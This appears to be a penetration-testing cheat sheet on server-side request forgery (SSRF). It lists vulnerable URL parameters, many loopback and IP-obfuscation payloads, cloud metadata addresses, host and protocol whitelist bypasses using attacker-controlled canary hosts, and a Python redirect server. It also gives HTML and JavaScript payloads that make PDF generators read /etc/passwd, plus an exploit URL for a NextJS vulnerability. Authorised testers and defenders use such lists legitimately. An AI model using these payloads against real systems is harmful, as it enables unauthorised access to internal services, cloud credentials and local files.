Detection - Vulnerable Parameters
Copy ?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}
?show={target}
?navigation={target}
Basic payload
Copy 127.0.0.1:80
127.0.0.1:443
127.0.0.1:22
127.1:80
0
0.0.0.0:80
localhost:80
[::]:80/
[::]:25/ SMTP
[::]:3128/ Squid
[0000::1]:80/
[0:0:0:0:0:ffff:127.0.0.1]/thefile
①②⑦.⓪.⓪.⓪
127.127.127.127
127.0.1.3
127.0.0.0
2130706433/
017700000001
3232235521/
3232235777/
0x7f000001/
0xc0a80014/
{domain}@127
.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@127
.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@localhost
localhost#{domain}
{domain}.localhost
localhost/{domain}
localhost/?d={domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}st:+11211aaa
st:00011211aaaa
0/
127.1
127.0.1
1.1.1.1 &@2.2.2.2# @3
.3.3.3/
127.1.1.1:80\\@127
.2.2.2:80/
127.1.1.1:80\\@@127
.2.2.2:80/
127.1.1.1:80:\\@@127
.2.2.2:80/
127.1.1.1:80#\\@127
.2.2.2:80/
Paylod List
Finding SSRF with Burp
Match: https?:\/\/(www\.)?[-a-zA-Z0–9@:%._\+~#=]{1,256}\.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%_\+.~#?&//=]*)
Replace: https://{YOUR_SERVER}/ (Burp Collaborator)
Source: https://x.com/intigriti/status/1848288871735320916?t=bTTpk3N1LoqLpO1768DhQw&s=03
Port scan
Copy http://127.0.0.1:§80§
Filter Bypass
Burp extension
Decimal notation
Copy http://2130706433 equals http://127.0.0.1.
Other notation
Copy 127.1 equals 127.0.0.1
Copy IPFuscator
Author: Vincent Yiu (@vysecurity)
https://www.github.com/vysec/IPFuscator
Version: 0.1.0
IP Address: 127.0.0.1
Decimal: 2130706433
Hexadecimal: 0x7f000001
Octal: 017700000001
Full Hex: 0x7f.0x0.0x0.0x1
Full Oct: 0177.0.0.01
Random Padding:
Hex: 0x000000000007f.0x000000000000000000000000000000.0x0000.0x0000000000000000000000001
Oct: 00000000000000000000000177.000000000000000000.00000000000000000000000000000.000001
Random base:
#1: 0x7f.0x0.0.01
#2: 0x7f.0x0.0x0.1
#3: 0177.0x0.0x0.0x1
#4: 0x7f.0.0.01
#5: 127.0x0.0.0x1
Random base with random padding:
#1: 127.0x00000000.000000.000000000000000001
#2: 127.0x0000000000000.0x00000000000000000000000000000.0001
#3: 0000000000000000177.0x0000000000000000000000.0x00000000000000000000000000.1
#4: 0000000000000000000177.0.000000.1
#5: 127.0000000000000000000000.0x0000000000000000000.000000000000000000000000000001
Copy 1%32%37.0.0.%31
12%37.%30.%30.%31
%31%327.%30.0.%31
%31%327.%30.%30.1
12%37.0.%30.1
127.%30.%30.%31
1%32%37.0.%30.1
%3127.0.0.%31
%31%32%37.0.%30.%31
1%32%37.%30.0.1
%31%32%37.0.0.%31
%31%32%37.%30.0.%31
%312%37.0.%30.1
%312%37.0.%30.%31
127.0.%30.%31
%31%32%37.0.0.1
1%327.%30.%30.1
%312%37.%30.0.1
%31%32%37.0.%30.1
1%327.%30.0.%31
127.%30.0.%31
%31%327.0.0.%31
127.%30.%30.1
%3127.0.%30.%31
%31%327.%30.%30.%31
1%32%37.%30.%30.1
%3127.%30.%30.1
%31%327.0.%30.1
12%37.%30.0.%31
12%37.%30.%30.1
%312%37.%30.%30.1
1%32%37.0.%30.%31
%31%32%37.%30.0.1
%312%37.0.0.%31
12%37.0.%30.%31
%312%37.%30.0.%31
1%32%37.%30.0.%31
%3127.%30.0.%31
%3127.0.%30.1
%312%37.%30.%30.%31
%31%327.0.%30.%31
1%327.0.%30.%31
1%327.%30.%30.%31
More payload: https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass
Use your own server to redirect on localhost
redirector.py
:
Copy #!/usr/bin/env python3
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler
if len(sys.argv)-1 != 2:
print("""
Usage: {} <port_number> <url>
""".format(sys.argv[0]))
sys.exit()
class Redirect(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', sys.argv[2])
self.end_headers()
def send_error(self, code, message=None):
self.send_response(302)
self.send_header('Location', sys.argv[2])
self.end_headers()
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
Run redirector server:
Copy python3 redirector.py 80 http://127.0.0.1
Vicitim payload: http://[YOUR_IP]
DNS Rebinding
Also try 127.0.0.1
and 169.254.169.254
More payloads
Also check Paylaod List
Cloud Metadata IP
Copy 169.254.169.254
169.254.43518
169.16689662
0xA9.254.0251.0376
URL / Host Validation Bypass
Copy https://assets.example.com.attacker.com/
Replace "{CANARY_TOKEN}" with your controlled hostname and replace "example.com" with a whitelisted target host.
Copy .{CANARY_TOKEN}
@{CANARY_TOKEN}
example.com.{CANARY_TOKEN}
example.com@{CANARY_TOKEN}
example.comx.{CANARY_TOKEN}
{CANARY_TOKEN}#example.com
{CANARY_TOKEN}?example.com
{CANARY_TOKEN}#@example.com
{CANARY_TOKEN}?@example.com
127.0.0.1.nip.io
example.com.127.0.0.1.nip.io
127.1
localhost.me
Bypassing protocol whitelists
Copy //{CANARY_TOKEN}
\\{CANARY_TOKEN}
////{CANARY_TOKEN}
\\\\{CANARY_TOKEN}
http:{CANARY_TOKEN}
https:{CANARY_TOKEN}
/%00/{CANARY_TOKEN}
/%0A/{CANARY_TOKEN}
/%OD/{CANARY_TOKEN}
/%09/{CANARY_TOKEN}
Gopher
Blind SSRF with OOB
See Use your own server to redirect on localhost
Platform to receive HTTP & DNS callbacks for SSRF (Blind) - interactsh
SSRF (XSS) in PDF Generator
Copy <iframe src="http://localhost/"></iframe>
Copy <iframe src=file:///etc/passwd></iframe>
Copy <!-- Using XHR -->
<script>var x=new XMLHttpRequest();x.onload=(()=>document.write(this.responseText));x.open('GET','http://127.0.0.1');x.send();</script>
<!-- Using Fetch -->
<script>fetch('http://127.0.0.1').then(async r=>document.write(await r.text()))</script>
<!-- Using embed -->
<embed src="http://127.0.0.1" />
<!-- Using base HTML tag -->
<base href="http://127.0.0.1" />
<!-- Loading external stylesheet/script -->
<link rel="stylesheet" src="http://127.0.0.1" />
<script src="http://127.0.0.1"></script>
<!-- Meta-tag to auto-refresh page -->
<meta http-equiv="refresh" content="0; url=http://127.0.0.1/" />
<!-- Loading external image -->
<img src="http://127.0.0.1" />
<!-- Loading external SVG -->
<svg src="http://127.0.0.1" />
<!-- Useful to bypass blacklists -->
<input type="image" src="http://127.0.0.1" />
<video src="http://127.0.0.1" />
<audio src="http://127.0.0.1" />
<audio><source src="http://127.0.0.1"/></audio>
Copy <script>
var x = new XMLHttpRequest();
x.onload=function(){ document.write(this.responseText) };
x.open('GET','http://127.0.0.1'); // You can also read local system files such as "/etc/passwd"
x.send();
</script>
Copy <script>
var x = new XMLHttpRequest();
x.onload=function(){ document.write(this.responseText) };
x.open("GET","file:///etc/passwd"); x.send();
</script>
NextJS apps
CVE-2024-34351 - fixed in v14.1.1.
Copy https://example.com/_next/image?url=https://localhost:2345/api/v1/x&w=256&q=75
Copy https://example.com/_next/image?url=https://third-party.com/logout%3furl%3Dhttps%3A%2F%2Flocalhost%3A2345%2Fapi%2Fv1%2Fx&w=256&q=75
Tools
SSRFmap
Autossrf
0dSSRF
SSRFPwned
Resources